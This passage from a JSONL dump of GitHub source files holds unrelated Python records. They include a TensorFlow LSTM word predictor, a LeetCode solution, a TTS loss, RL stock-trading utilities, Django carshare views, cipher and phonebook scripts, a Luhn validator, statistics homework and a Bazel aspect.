dict(zip(dictionary.values(), dictionary.keys()))\n\n ## 函数值是��回正向字典和反向字典\n return dictionary,reverse_dictionary\n\ndictionary, reverse_dictionary = build_dataset(words)\n#print (dictionary)\n#print (reverse_dictionary)\n\n### 2. 开始构建模型参数\nvocab_size = len(dictionary)\nn_input = 3\nn_hidden = 512\nbatch_size = 20\n\n#with tf.variable_scope('scope1', reuse=True):\nweight = tf.get_variable('weight_out', [2*n_hidden, vocab_size], \\\n initializer= tf.random_normal_initializer)\nbias = tf.get_variable('bias_out', [vocab_size], \\\n initializer= tf.random_normal_initializer)\n\n\n### 定义RNN\ndef RNN(x, weight, bias):\n x = tf.reshape(x, [-1, n_input])\n x = tf.split(x, n_input, 1)\n ## 调用tensorflow 接口来定义lstm_cell\n ## 构建前向cell\n rnn_cell_format = tf.nn.rnn_cell.BasicLSTMCell\\\n (n_hidden, state_is_tuple=True, forget_bias=1.0)\n ## 构建后向cell\n rnn_cell_backmat = tf.nn.rnn_cell.BasicLSTMCell\\\n (n_hidden, state_is_tuple=True, forget_bias=1.0)\n outputs, outputs_states_fw, output_states_hw = tf.nn.static_bidirectional_rnn\\\n (rnn_cell_format, rnn_cell_backmat, x, dtype=tf.float32)\n return tf.matmul(outputs[-1], weight) + bias\n\n### 数据转换\ndef build_data(offset):\n while offset + n_input > vocab_size:\n offset = random.randint(0, vocab_size-n_input)\n ## 随机产生样本范围中的3个连续的词,并将其中映射为数值\n symbols_in_key = [[dictionary[str(words[i])]] for i in range(offset, offset+n_input)]\n symbols_out_onehot = np.zeros([vocab_size], dtype=float)\n symbols_out_onehot[dictionary[str(words[offset+n_input])]] = 1.0\n return symbols_in_key, symbols_out_onehot\n\n### 搭建损失函数\nx = tf.placeholder(tf.float32, [None, n_input, 1])\ny = tf.placeholder(tf.float32, [None, vocab_size])\npred = RNN(x, weight, bias)\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))\n#with tf.variable_scope('scope2', reuse=True):\noptimizer = tf.train.AdamOptimizer(learning_rate=1e-5).minimize(cost)\n\n### 构造准确率计算函数\ncorrect_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y,1))\n### 把准确率变为百分比\naccuary = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n\n### 训练模型\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(50000):\n x_train, y_train = [], []\n for b in range(batch_size):\n new_x, new_y = build_data(random.randint(0, vocab_size))\n x_train.append(new_x)\n y_train.append(new_y)\n _opt = sess.run(optimizer, feed_dict={x:np.array(x_train), y:np.array(y_train)})\n# print (\"train ... \")\n \n if i%100 == 0:\n acc, out_pred = sess.run([accuary, pred], feed_dict={x:np.array(x_train), y:np.array(y_train)})\n symbols_in = [reverse_dictionary[word_index[0]] for word_index in x_train[0]]\n symbols_out = reverse_dictionary[int(np.argmax(y_train, 1)[0])]\n pred_out = reverse_dictionary[int(np.argmax(out_pred,1)[1])]\n print ('epoch:%d, Acc:%f'%(i,acc))\n print ('%s-[%s]vs[%s]'%(symbols_in, symbols_out, pred_out))\n print (out_pred.shape)\n\n while True:\n start_sentence = input(\"Please input %s words:\"%n_input)\n words = start_sentence.strip().split()\n if len(words) != n_input:\n continue\n elif words[0] == words[1] and words[1] == words[2] and words[2] == 'exit':\n break\n else: \n pass\n \n print (\"predicting ... \")\n \n try:\n symbols_in_keys = [dictionary[str(words[i])] for i in range(len(words))]\n for _ in range(1):\n keys = np.reshape(np.array(symbols_in_keys), [-1, n_input, 1])\n onehot_pred = sess.run(pred, feed_dict={x:keys})\n onehot_pred_index = int(tf.argmax(onehot_pred,1).eval())\n start_sentence = '%s%s'%(start_sentence, reverse_dictionary[onehot_pred_index])\n symbols_in_keys = symbols_in_keys[1:]\n symbols_in_keys.append(onehot_pred_index)\n print (start_sentence)\n except:\n print(\"Word not in dictionary\")\n\n\n\n","repo_name":"zxorange321/learn","sub_path":"dl/lstm/class_lstm.py","file_name":"class_lstm.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"36334709168","text":"from typing import List\n\n\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n hs2 = {}\n for i in nums2:\n hs2[i] = hs2.get(i,0) + 1\n \n ar = []\n for i in nums1:\n if i in hs2 and hs2[i] != 0:\n ar.append(i)\n hs2[i] -= 1\n return ar\n \n","repo_name":"G4vp/LeetCode","sub_path":"Python/Easy/350-Intersection_of_Two_Arrays_II.py","file_name":"350-Intersection_of_Two_Arrays_II.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"18406456351","text":"from torch import Tensor, nn\nfrom tts.collate_fn import Batch\nfrom torch.nn import functional as F\n\n\nclass WaveFormReconstructionLoss(nn.Module):\n def __init__(self, featurizer, pad_value):\n super().__init__()\n self.waveform_loss = nn.L1Loss()\n self.featurizer = featurizer\n self.pad_value = pad_value\n\n def forward(self, batch: Batch) -> Tensor:\n melspec_prediction = self.featurizer(batch.waveform_prediction)\n melspec = batch.melspec\n\n diff_len = melspec_prediction.shape[-1] - melspec.shape[-1]\n\n if diff_len < 0:\n melspec_prediction = F.pad(melspec_prediction, (0, -diff_len), value=self.pad_value)\n else:\n melspec = F.pad(melspec, (0, diff_len), value=self.pad_value)\n \n waveform_l1 = self.waveform_loss(\n melspec,\n melspec_prediction\n )\n\n return waveform_l1\n","repo_name":"timothyxp/Hi-Fi-Gan","sub_path":"tts/loss/reconstruction.py","file_name":"reconstruction.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"75103146496","text":"import os\nimport pdb\nimport torch\nimport random\nimport numpy as np\nimport pandas as pd\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\nimport pdb\n\nfrom tqdm import trange\nfrom typing import List, Dict\nfrom torch.optim import AdamW, Adam\nfrom IPython.display import display\nfrom abc import ABC, abstractmethod\nfrom pandas_datareader import data as datareader\nfrom matplotlib.collections import LineCollection\nfrom matplotlib.colors import ListedColormap, BoundaryNorm\n\nfrom stockstats import wrap\nimport pyfolio\n\nPATH_TO_DATA = 'data/AAPL_stocks_splits.csv'\n\ndef seed_everything(seed = 42):\n random.seed(seed)\n np.random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n generator = torch.Generator()\n generator.manual_seed(seed)\n\nSEED = 42 \nDEVICE = torch.device('cuda:0') if torch.cuda.is_available() else torch.device('cpu')\nRD = lambda x: np.round(x, 3)\nsigmoid = lambda x: 1 / (1 + np.exp(-x))\n\nSTAGE = 1 # if we change the structure of the GlobalLogger.csv we increase the stage number\nUSER = \"adrian\"\n\nseed_everything(seed = SEED)\n\ndef calculate_scalers(normalizers, features, train_data):\n from sklearn.preprocessing import MinMaxScaler\n\n scalers = {}\n\n for idx, elem in enumerate(normalizers):\n if elem == 'minmax':\n scaler = MinMaxScaler()\n scaler.fit(np.array(train_data[0])[:, idx].reshape(-1, 1))\n\n scalers[features[idx]] = scaler\n # print(np.array(train_data[0])[:, idx])\n\n return scalers\n\ndef normalize_features(current_day: list, next_day: list, config_file, scalers):\n # assert normalizers in \\\n # [\"sigmoid\", \"percent\", \"minmax\"], \"[normalizer] -> Option Not Implemented\"\n\n features = list(config_file[\"features_used\"].keys())\n normalizers = list(config_file[\"features_used\"].values())\n\n normalized_features = []\n for i in range(len(current_day)):\n if normalizers[i] == \"sigmoid\":\n normalized_feature = sigmoid(next_day[i] - current_day[i])\n elif normalizers[i] == \"percent\":\n try:\n normalized_feature = next_day[i] - current_day[i] / current_day[i]\n except ZeroDivisionError:\n normalized_feature = next_day[i] - current_day[i]\n elif normalizers[i] == \"minmax\":\n scaler = scalers[features[i]]\n normalized_feature = scaler.transform([[next_day[i] - current_day[i]]]).squeeze(0).squeeze(0)\n\n normalized_features.append(normalized_feature)\n\n return normalized_features\n\nclass EpsilonScheduler():\n def __init__(self, epsilon = 1.0, epsilon_final = 0.01, epsilon_decay = 0.995):\n self.epsilon = epsilon\n self.epsilon_final = epsilon_final\n self.epsilon_decay = epsilon_decay\n\n def get(self):\n return self.epsilon\n\n def step(self):\n if self.epsilon > self.epsilon_final:\n self.epsilon *= self.epsilon_decay\n\nclass GlobalLogger:\n def __init__(self, path_to_global_logger: str, save_to_log: bool):\n self.save_to_log = save_to_log\n self.path_to_global_logger = path_to_global_logger\n\n if os.path.exists(self.path_to_global_logger):\n self.logger = pd.read_csv(self.path_to_global_logger)\n else:\n # create folder if not exist\n os.makedirs(os.path.dirname(self.path_to_global_logger), exist_ok=True)\n\n def append(self, config_file: Dict, output_file: Dict):\n if self.save_to_log == False: return\n\n if os.path.exists(self.path_to_global_logger) == False:\n config_columns = [key for key in config_file.keys()]\n output_columns = [key for key in output_file.keys()]\n\n columns = config_columns + output_columns \n logger = pd.DataFrame(columns = columns)\n logger.to_csv(self.path_to_global_logger, index = False)\n \n self.logger = pd.read_csv(self.path_to_global_logger)\n sample = {**config_file, **output_file}\n columns = [key for (key, value) in sample.items()]\n\n row = [value for (key, value) in sample.items()]\n row = np.array(row)\n row = np.expand_dims(row, axis = 0)\n\n sample = pd.DataFrame(row, columns = columns)\n self.logger = self.logger.append(sample, ignore_index = True)\n self.logger.to_csv(self.path_to_global_logger, index = False)\n\n def get_version_id(self):\n if os.path.exists(self.path_to_global_logger) == False: return 0\n logger = pd.read_csv(self.path_to_global_logger)\n ids = logger[\"id\"].values\n if len(ids) == 0: return 0\n return ids[-1] + 1\n \n def view(self):\n from IPython.display import display\n display(self.logger)\n\n\nclass Logger:\n def __init__(self, path_to_logger: str = 'logger.log', distributed = False):\n from logging import getLogger, INFO, FileHandler, Formatter, StreamHandler\n\n self.logger = getLogger(__name__)\n self.logger.setLevel(INFO)\n\n if distributed == False:\n handler1 = StreamHandler()\n handler1.setFormatter(Formatter(\"%(message)s\"))\n self.logger.addHandler(handler1)\n\n handler2 = FileHandler(filename = path_to_logger)\n handler2.setFormatter(Formatter(\"%(message)s\"))\n self.logger.addHandler(handler2)\n\n def print(self, message):\n self.logger.info(message)\n\n def close(self):\n handlers = self.logger.handlers[:]\n for handler in handlers:\n handler.close()\n self.logger.removeHandler(handler)\n","repo_name":"andeceneu4more/rl-stoks-pick","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":5658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27960663855","text":"from django.shortcuts import render\nfrom django.db import models\n\nimport datetime\nfrom dateutil import parser\n\nfrom carshare.models import *\n \ndef index(request):\n return render(request, 'index.html')\n\n\ndef reservations(request):\n\n if request.method == 'POST':\n insert_reservation(request.POST)\n\n filter_date = datetime.date.today()\n res_tuples = []\n\n if 'date' in request.GET and request.GET['date']:\n filter_date = request.GET['date']\n filter_date = parser.parse(filter_date)\n res_tuples = reservations_for_day(filter_date)\n reservations = [Reservation(t) for t in res_tuples]\n else:\n reservations = all_reservations()\n \n for res in reservations:\n res.car = car_by_id(res.carNum)\n res.member = member_by_id(res.memNum)\n res.location = location_by_id(res.locNum)\n\n cars = all_cars()\n\n for car in cars:\n car.location = location_by_id(car.locNum)\n\n members = all_members()\n\n return render(request, 'reservations_today.html', {'reservations': reservations,\n 'cars': cars,\n 'members': members})\n\ndef usage_history(request, carNum):\n\n car = car_by_id(carNum)\n \n today = datetime.date.today()\n\n res_tuples = reservations_for_day(filter_date)\n\n reservations = [Reservation(t) for t in res_tuples]\n\n for res in reservations:\n res.car = car_by_id(res.carNum)\n res.member = member_by_id(res.memNum)\n res.location = location_by_id(res.locNum)\n\n return render(request, 'reservations_today.html', {'reservations': reservations})\n\ndef cars(request):\n\n if request.method == 'POST':\n insert_car(request.POST)\n\n if 'locNum' in request.GET and request.GET['locNum']:\n cars = cars_for_location(request.GET['locNum'])\n elif 'freeCars' in request.GET and request.GET['freeCars']:\n cars = cars_not_in_use()\n else:\n cars = all_cars()\n\n for car in cars:\n car.location = location_by_id(car.locNum)\n car.reservations = reservations_for_car(car.id)\n\n history = past_reservations(car.id)\n\n for res in history:\n res.location = location_by_id(res.locNum)\n res.member = member_by_id(res.memNum)\n\n car.usageHistory = history\n\n print(history)\n\n locations = all_locations()\n\n return render(request, 'cars.html', {'cars': cars,\n 'locations': locations,})\n\ndef members(request):\n\n if request.method == 'POST':\n insert_member(request.POST)\n\n members = all_members()\n\n return render(request, 'members.html', {'members': members})\n\n\ndef account(request, memNum):\n\n if request.method == 'POST':\n if 'annualFee' in request.POST:\n charge_annual_fee(memNum)\n elif 'payBalance' in request.POST:\n pay_balance(memNum)\n\n member = member_by_id(memNum)\n\n transactions = transcations_for_member(memNum)\n\n can_charge = can_charge_annual_fee(memNum)\n\n balance = balance_for_member(memNum)\n\n return render(request, 'account.html', {'member': member,\n 'transactions': transactions,\n 'balance': balance,\n 'can_charge_annual_fee': can_charge})\n","repo_name":"ChrisCooper/cisc-332-project","sub_path":"carshare/carshare/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"5253386619","text":"# -*- coding: utf-8 -*-\n\nimport os\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\nfrom setuptools.command.test import test as TestCommand\n\nclass PyTest(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = []\n self.test_suite = True\n def run_tests(self):\n import pytest\n pytest.main(self.test_args)\n\ndescription = 'Automatic rule-based tag suggestor for Pocket'\nif os.path.exists('README.md'):\n with open('README.md', 'r') as fp:\n long_description = fp.read()\nelse:\n long_description = description\n\nsetup(\n description=description,\n name='repocket',\n zip_safe=False,\n author='Kirill Borisov',\n author_email='borisov.kir@gmail.com',\n url='https://github.com/lensvol/repocket',\n keywords=['pocket', 'tag'],\n long_description=long_description,\n version='0.1.0',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Environment :: Console',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n ],\n license='MIT',\n install_requires=[\n 'click==3.3',\n 'pocket==0.3.5',\n 'PyYAML==3.11',\n ],\n tests_require=['pytest'],\n cmdclass = {'test': PyTest},\n packages=['repocket', 'tests'],\n entry_points={\n 'console_scripts': ['repocket=repocket.main:processor']\n },\n)\n","repo_name":"lensvol/repocket","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"30552605282","text":"#!/usr/bin/python3\n'''\n@ODiN -iwnl-\n\nRequires AdditiveCipher.py , CeaserCipher.py ,\n OneTimePadCipher.py , AutoKeyCipher.py\n\n'''\n\nimport AdditiveCipher,CeaserCipher,OneTimePadCipher,AutoKeyCipher\n\ndef main():\n\n\twhile True:\n\t\tprint('\\n\\t\\t\\t|| Cipher Algorithms ||')\n\t\tprint('''\\n1. Additive Cipher\\n2. Ceaser Cipher\\n3. One Time Pad Cipher\\n4. AutoKey Cipher\\n5. Exit\\n''')\n\t\tch = int(input('Enter your choice : '))\n\n\t\tif ch is 1:\n\t\t\tAdditiveCipher.additive()\n\t\telif ch is 2:\n\t\t\tCeaserCipher.ceaser()\n\t\telif ch is 3:\n\t\t\tOneTimePadCipher.otpc()\n\t\telif ch is 4:\n\t\t\tAutoKeyCipher.AutoKey()\n\t\telif ch is 5:\n\t\t\texit(0)\n\t\telse:\n\t\t\tprint('Invalid Choice')\n\t\t\tpass\n\n# end of main\n\nif __name__ == '__main__':\n main()\n","repo_name":"AkhilendraGadde/CipherAlgorithms","sub_path":"CipherModules.py","file_name":"CipherModules.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28678745898","text":"\n# method menampilakan daftar kontak\ndef display_kontak(daftar_kontak):\n # lakukan for loop dari data dictionary\n for kontak in daftar_kontak:\n print(\"===================\")\n print(f\"Nama: {kontak['nama']}\")\n print(f\"Email: {kontak['email']}\")\n print(f\"Telepon: {kontak['telepon']}\")\n\n#method tambah kontak\ndef new_kontak():\n nama = input(\"Nama :\")\n email = input(\"Email :\")\n telepon = input(\"Telepon :\")\n #buat variable \"kontak\" untuk menampung\n kontak = {\n \"nama\" : nama,\n \"email\" : email,\n \"telepon\" : telepon\n }\n #langsung return nilai kedalam kontak \n return kontak\n\n#method cari kontak\ndef cari_kontak(daftar_kontak):\n nama_dicari = input(\"Nama yang dicari : \")\n#lakukan for loop untuk akses data\n for kontak in daftar_kontak:\n nama = kontak[\"nama\"]\n #mencari data dengan method find, find mengembalikan posisi index karakter yang dicari, jika yang di cari \"e\" dari \"eko\" maka yang direturn adalah index[0], jika tidak ada maka -1\n if nama.lower().find(nama_dicari.lower()) != -1:\n print(\"=====================\")\n print(f\"Nama: {kontak['nama']}\")\n print(f\"Email: {kontak['email']}\")\n print(f\"Telepon: {kontak['telepon']}\")\n else:\n print(\"Nama tidak ditemukan\")\n\n\n#menghapus kontak\ndef del_kontak(daftar_kontak):\n #masukan nomor telepon untuk dicari terlebih dahulu\n telepon = input(\"No Telepon yang ingin dihapus : \")\n # set index di -1 untuk trigger ketika data tidak ada\n index = -1\n # lakukan for loop untuk mencari data kontak dengan range dimulai dari index 0 untuk mengambil jumlah data menggunkan len\n for i in range(0,len(daftar_kontak)):\n #hasil pencarian dimasukan kedalam variable kontak\n kontak = daftar_kontak[i]\n #jika \"telepon\" yang telah diinputkan sama dengan value yang ada dalam \"kontak\" break untuk menghentikan perulangan\n if telepon == kontak[\"telepon\"]:\n index = i\n break\n #jika hasil pencarian tidak ada didalam index yang dimulai dari 0 maka \"kontak tidak ditemukan\"\n if index == -1:\n print(\"Kontak tidak ditemukan!\")\n #jika ditemukan maka eksekusi function del\n else:\n del daftar_kontak[index]\n print(\"kontak berhasil dihapus!\")\n\n","repo_name":"alghif4ri/python-learning","sub_path":"mini project/phonebook/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"20480040086","text":"class Luhn(object):\n def __init__(self, card_num):\n self.stripped = card_num.replace(' ','')\n self.card = list(self.stripped)[::-1]\n self.luhn = []\n\n def is_valid(self):\n if not self.stripped.isdigit() or len(self.stripped) < 2:\n return False\n for i in range(len(self.card)):\n if i % 2 == 1:\n double = int(self.card[i]) * 2\n self.luhn.append(double if double < 10 else double - 9)\n else:\n self.luhn.append(int(self.card[i]))\n self.sum = sum(self.luhn)\n return self.sum % 10 == 0\n","repo_name":"markostanojlovic/playingexercism","sub_path":"python/luhn/luhn_v1.py","file_name":"luhn_v1.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"39533431143","text":"import pandas as pd\nfrom statistics.inference import samples\nfrom statistics.inference import hypothesis\n\nimmune_tea_data = pd.read_csv('statistics/data/ImmuneTea.csv')\nwetsuit_data = pd.read_csv('statistics/data/Wetsuits.csv')\n\n# Q7.a Data: Wetsuits (difference of two means), Test: is there a difference in swimming speeds due to wearing a wetsuit\ntest_result = hypothesis.two_mean_test(wetsuit_data.describe(), ('Wetsuit', 'NoWetsuit'),\n alternative='two-sided')\nprint(f'Q7: The p-value of the difference of means is {test_result[\"p-value\"]}')\n\n# Q7.a Data: Wetsuits (matched pair), Test: is there a difference in swimming speeds due to wearing a wetsuit\nwetsuit_data_difference = wetsuit_data['NoWetsuit'] - wetsuit_data['Wetsuit']\ntest_result = hypothesis.single_mean_test(wetsuit_data_difference, mu_0=0, alternative='two-sided')\nprint(f'Q7: The p-value as matched pairs is {test_result[\"p-value\"]}')\n\n# Q7.b\n# Q7.c Data Manipulation for the StatKey Simulation\nwetsuit_statkey = pd.DataFrame(\n data={\n 'Time': wetsuit_data['Wetsuit'],\n 'Wetsuit': 'yes'\n })\nwetsuit_statkey = wetsuit_statkey.append(pd.DataFrame(\n data={\n 'Time': wetsuit_data['NoWetsuit'],\n 'Wetsuit': 'no'\n }\n ), ignore_index=True)\n# File for Two Means Simulation\nwetsuit_statkey.to_csv('/tmp/wetsuit_statkey_two-means.csv', index=False)\n\n# File for matched pairs Simulation\nwetsuit_data['Difference'] = wetsuit_data['Wetsuit'] - wetsuit_data['NoWetsuit']\nwetsuit_data.to_csv('/tmp/wetsuit_statkey_matched-pairs.csv', index=False)\n\n# Q11. The manufacturers are interested in estimating the percentage of defective light bulbs coming from a certain\n# process. They want a 90% confidence interval with a margin of error of 2%. How many light bulbs must they test?\nsample_size = samples.single_proportion_sample_size(margin=0.02, confidence_interval=0.90)\nprint(f'Q11: The size of the sample needed is {sample_size}')\n\n# Q12. Same question as in the previous problem, but assume they had a reason to believe the proportion is fairly close\n# to 6%. How large a sample must they test?\nsample_size = samples.single_proportion_sample_size(p_tilde=0.06, margin=0.02, confidence_interval=0.90)\nprint(f'Q12: The size of the sample needed is {sample_size}')\n\n# Q13. An airline has a regular flight between two cities. From a previous study, we estimate the standard deviation of\n# the flight times to be 9.34 minutes. We want a 99% confidence interval for the average flight time with a margin of\n# error of 3minutes. How large a sample would we need to find that confidence interval?\nsample_size = samples.single_mean_sample_size(sigma_tilde=9.34, margin=3, confidence_interval=0.99)\nprint(f'Q13: The size of the sample needed is {sample_size}')\n\n# Q14. NOOP\nprint('Q14: NOOP')\n\n# Q15. Data: Immune Tea, Test: Production of interferon gamma is enhanced in tea drinkers?\ninterferon_gamma = immune_tea_data.groupby('Drink').describe().get('InterferonGamma').transpose()\ntest_result = hypothesis.two_mean_test(interferon_gamma, ('Tea', 'Coffee'), alternative='greater')\nprint(f'Q15: The p-value is {test_result[\"p-value\"]}')\ntest_result = hypothesis.two_mean_test(interferon_gamma, ('Tea', 'Coffee'), alternative='greater', df='satterthwait')\nprint(f'Q15: The p-value, using the Satterthwait approximation is {test_result[\"p-value\"]}')\n","repo_name":"cgamamx/dsc-381","sub_path":"homeworks/hw_10.py","file_name":"hw_10.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"27904706311","text":"from pprint import pprint\nd = {}\n\nimport json\n\nwith open('./topics.txt', 'r') as f:\n l = ([list(map(lambda x: x.lower(), x.strip().split('\\t'))) for x in f.readlines()])\n\n\nfor item in l:\n pprint(item)\n if len(item) == 2:\n d[item[0]] = item[1].replace(' (parent topic)','')\n \n \npprint(d)\n\nwith open('categories.json', 'w') as fp:\n json.dump(d, fp)\n\n","repo_name":"raphacosta27/projredesoc","sub_path":"projeto 2/collector/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2969017033","text":"def _srcs_aspect_impl(target, ctx):\n\n if hasattr(ctx.rule.attr, 'srcs'):\n srcs = \" \".join([f.path for src in ctx.rule.attr.srcs for f in src.files])\n else:\n srcs = \"\"\n\n print(\"srcs: \", srcs)\n\n output = ctx.new_file(\"srcs.txt\")\n outputs = [output]\n\n ctx.file_action(\n output = output,\n content = srcs,\n )\n\n return struct(output_groups = {\"srcs\" : set(outputs)})\n\nsrcs_aspect = aspect(implementation = _srcs_aspect_impl,\n attr_aspects = [\"deps\"]\n)","repo_name":"natansil/bazel-learning","sub_path":"bazel_aspect/extensions/srcs-aspect.bzl","file_name":"srcs-aspect.bzl","file_ext":"bzl","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"10939070154","text":"# -*- coding: utf-8 -*-\nimport os\nimport errno\n\n\ndef silentremove(filename):\n \"\"\"If ``filename`` exists, delete it. Otherwise, return nothing.\n See http://stackoverflow.com/q/10840533/2823213.\"\"\"\n try:\n os.remove(filename)\n except OSError as e: # this would be \"except OSError, e:\" before Python 2.6\n if e.errno != errno.ENOENT: # errno.ENOENT = no such file or directory\n raise # re-raise exception if a different error occured","repo_name":"ryanpdwyer/hdf5plotter","sub_path":"hdf5plotter/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22035069815","text":"item = int(input())\n\n\ndef n_sum(n):\n n_cube_root = int(round(n ** (1. / 3.), 2))\n for i in range(n_cube_root+1):\n division = n - i ** 3\n counter = i\n for j in range(int(round(division**(1./3.), 2))+1):\n if division == j**3:\n if j > counter:\n print(counter, j)\n return True\n else:\n print(j, counter)\n return True\n\n\nif not n_sum(item):\n print('impossible')","repo_name":"Weakne55/MIPT","sub_path":"Sem1/Contest 4/Contest 4.E.py","file_name":"Contest 4.E.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38505681580","text":"import argparse\n\nfrom omegaconf import OmegaConf\n\nfrom liteasr.models import MODEL_DATACLASS_REGISTRY\nfrom liteasr.optims import OPTIMIZER_DATACLASS_REGISTRY\nfrom liteasr.tasks import TASK_DATACLASS_REGISTRY\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"option\", type=str, help=\".